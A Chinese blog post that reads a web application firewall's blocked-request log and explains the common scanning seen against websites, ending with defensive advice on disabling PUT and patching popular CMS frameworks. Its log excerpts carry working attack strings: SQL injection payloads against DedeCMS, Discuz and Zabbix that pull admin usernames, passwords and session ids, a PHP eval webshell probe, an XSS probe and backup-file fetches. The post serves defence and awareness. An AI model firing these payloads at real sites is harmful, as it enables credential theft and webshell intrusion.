从防护日志看网络日常扫描

前言

网站一旦公布在网络上，就代表世界上任何地方都可以访问你得网站，当然也就是可以攻击你得网站

从一些防护软件上我们每天可以看到一些安防软件触发得防护日志，下面举些来说说

日志

xxxx/js/updateNewsPoint.aspx?NewsID=1214020&RandomId=0.06040664033220855，

触发规则：禁止不常见的HTTP请求。(OPTIONS)

访问xxx/awlhz42644.txt

触发规则：禁止不常见的HTTP请求。(PUT)，已被拦截

上面是利用服务器配置不当，开放了OPTIONS，跟PUT协议头，从而利用

访问 xxxx.com/dxyylc/md5.aspx，

index.php?aid=9527

index.php?aid=511348

default.aspx?q={${eval($_POST[c])}}

触发规则：302::一句话木马利用工具防护一（PHP）， 可疑行为：eval (base64_decode($_POST，已被拦截。

个人认为出现上面这些得都是批量爬取网站批量扫描是否存在一句话后门。

访问 www.xxx.com/install/index.php.bak，

xx/data.bak

xx/sqldump.sql

xx/sql.sql

xx/sjk.sql

xx/backup.sql

触发规则：下载保护， 可疑行为：bak，已被拦截。

批量获取由于管理人员不注意把备份文件，压缩包之类放在根目录而没有处理，从而获取有用信息

/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs…..

/plus/search.php?keyword=as&typeArr[111=@`\\\’`) UnIon seleCt 1，2，3，4，5，6，7，8，9，10，userid，12，13，14，15，16，17，18，19，20，21，22，23，24，25，26，pwd，28，29，30，31，32，33，34，35，36，37，38，39，40，41，42 from `

/plus/recommend.php?aid=1&_FILES[type][name]&_FILES[type][size]&_FILES[type][type]&_FILES[type][tmp_name]=aa\’and char(@`’`) 50000Union 50000SeLect 1，2，3，concat(0x383839386739617364，group_concat(0x7C，userid，0x3a，pwd，0x7C)，0x3C2F6162633E)，5，6，7，8，9 from

/NewsType.asp?SmallClass=’ union select 0，username+CHR(124)+password，2，3，4，5，6，7，8，9 from admin union select * from news where 1=2 and ”=’，

/plus/mytag_js.php?dopost=saveedit&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100…..

/web/new/fenlei/search.php?mid=1&action=search&keyword=asd&postdb[city_id]=../../admin/hack&hack=jfadmin&action=addjf&Apower[jfadmin_mod]=1&fid=1&title=${eval($_POST[lequ])}

/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*)，concat(floor(rand(0)*2)，(substring((Select (select concat(sessionid，0x7e，userid，0x7e，status) from sessions where status=0 and userid=1 LIMIT 0，1))，1，62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

/faq.php?action=grouppermission&gids[99]=’&gids[100][0]=) and (select 1 from (select count(*)，concat(version()，floor(rand(0)*2))x from information_schema.tables group by x)a)

触发规则：109::对数据库进行数据查询操作防护，

上面得都是批量验证如WP,DEDECMS,THINKPHP,DZ,DZ,ZABBIX得历史漏洞从而获取WEBSHELL,或管理员账号密码

/js/upload/swfupload/swfupload.swf?movieName=”])}catch(e){if(!window.x){window.x=1;alert(“xss”)}}//

触发规则：202::XSS测试语句防护， 可疑行为：alert(“xss”)，已被拦截。

/skin/default/images/logo.gif/1.php，

触发规则：文件解析漏洞

验证站点是否存在解析漏洞，从而寻找相关利用点。

总结

其实很多能造成这些能拿SHELL得原因是因为管理员得疏忽，贪方便。

如PUT,OPTION权限,正常来说网站用不上。一旦开放PUT，就相当于给任何人上传木马得机会。

如使用大众化得框架，如，THINKPHP,DZ,DEDE这些，需时常留意是否有重大漏洞出现，及时升级更新修补。

有时间我也根据这些日志得信息写个批量漏洞得验证工具，看看是否真有那么多存在漏洞得网站。